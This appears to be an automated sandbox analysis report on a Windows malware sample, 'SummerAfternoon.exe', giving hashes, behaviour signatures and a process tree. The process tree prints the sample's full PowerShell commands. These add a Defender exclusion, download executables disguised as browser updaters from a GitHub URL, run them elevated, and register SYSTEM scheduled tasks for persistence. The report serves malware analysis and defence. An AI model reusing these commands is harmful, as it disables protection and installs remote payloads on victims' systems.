Overview

overview

8

Static

static

3

SummerAfte...re.dll

windows7-x64

1

SummerAfte...re.dll

windows10-2004-x64

1

SummerAfte...ms.dll

windows7-x64

1

SummerAfte...ms.dll

windows10-2004-x64

1

SummerAfte...on.exe

windows7-x64

8

SummerAfte...on.exe

windows10-2004-x64

8

SummerAfte...er.dll

windows10-2004-x64

1

Resubmissions

09/06/2024, 07:13

240609-h18jrsgb74 8

09/06/2024, 06:51

240609-hmrn4afh72 8

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    09/06/2024, 07:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SummerAfternoon/SummerAfternoon.exe

  • Size

    105KB

  • MD5

    3969fb2b3f1aba78dd50c3cb6b4e2137

  • SHA1

    b6fbd3cebda92a633369cbb979147ab645374d3b

  • SHA256

    9895f823394e434bb9a8ae10a3086960e5d60b10ef5c3877e4bed7b9411a9710

  • SHA512

    48b83334c8318c83c9122c44a26b02074c45bfed5ebd845b8ae4cc23957bda875473390ab2f91e46632eaef246c498ca63a3ef2df24771758296646bb4fb7c4e

  • SSDEEP

    3072:9GbNdhPc9aHE6j7F7I6jmBJqUYfWcE/ishP7KIz1+Km/J:9GbNdtc9wdh7T6bqUQo/ish+s

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\SummerAfternoon\SummerAfternoon.exe
    "C:\Users\Admin\AppData\Local\Temp\SummerAfternoon\SummerAfternoon.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Set-MpPreference -ExclusionExtension *.exe"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/1.exe" -OutFile "$Env:LocalAppData\Updates\firefox_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\firefox_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2412
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/2.exe" -OutFile "$Env:LocalAppData\Updates\chrome_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\chrome_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2408
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/3.exe" -OutFile "$Env:LocalAppData\Updates\ms_edge_updater.exe"; schtasks /create /tn "EdgeUpdater" /tr "$Env:LocalAppData\Updates\ms_edge_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\ms_edge_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /tn EdgeUpdater /tr C:\Users\Admin\AppData\Local\Updates\ms_edge_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f
        3⤵
        • Creates scheduled task(s)
        PID:296
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass "Invoke-WebRequest -Uri "https://github.com/HillbertDev/InsertNameHere/raw/main/4.exe" -OutFile "$Env:LocalAppData\Updates\system_updater.exe"; schtasks /create /tn "SystemUpdater" /tr "$Env:LocalAppData\Updates\system_updater.exe" /rl HIGHEST /sc ONLOGON /ru "SYSTEM" /f; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\system_updater.exe""
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /tn SystemUpdater /tr C:\Users\Admin\AppData\Local\Updates\system_updater.exe /rl HIGHEST /sc ONLOGON /ru SYSTEM /f
        3⤵
        • Creates scheduled task(s)
        PID:1448

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VHZSEA2GXM7NB21I6ZZR.temp
    Filesize

    7KB

    MD5

    4f89019d3f71d02108ee020cb85c6b2b

    SHA1

    7c7f34ba42c545590f1b823e1045c5ac0796719c

    SHA256

    ecbc72354af055626356626fc89d97515b3d8fa818716d765705c1f9825940ea

    SHA512

    a7f362acb8a1418611e36da3a0c6a2b6ea8a856c131b5ea2fa1255ec9140e30241604afd9cfd73fe37dcf10f85d941d2b8f6a20785a4128b76b3349b032fc85c

    Download Submit

  • memory/2412-23-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2412-29-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2604-0-0x000007FEF5AF3000-0x000007FEF5AF4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2604-1-0x000000013F690000-0x000000013F6AE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/2604-2-0x0000000000770000-0x000000000077E000-memory.dmp

    Filesize

    56KB

    Download

  • memory/2604-3-0x000000001B410000-0x000000001B4A0000-memory.dmp

    Filesize

    576KB

    Download

  • memory/2604-4-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

    Filesize

    9.9MB

    Download

  • memory/2604-5-0x000007FEF5AF3000-0x000007FEF5AF4000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2604-6-0x000007FEF5AF0000-0x000007FEF64DC000-memory.dmp

    Filesize

    9.9MB

    Download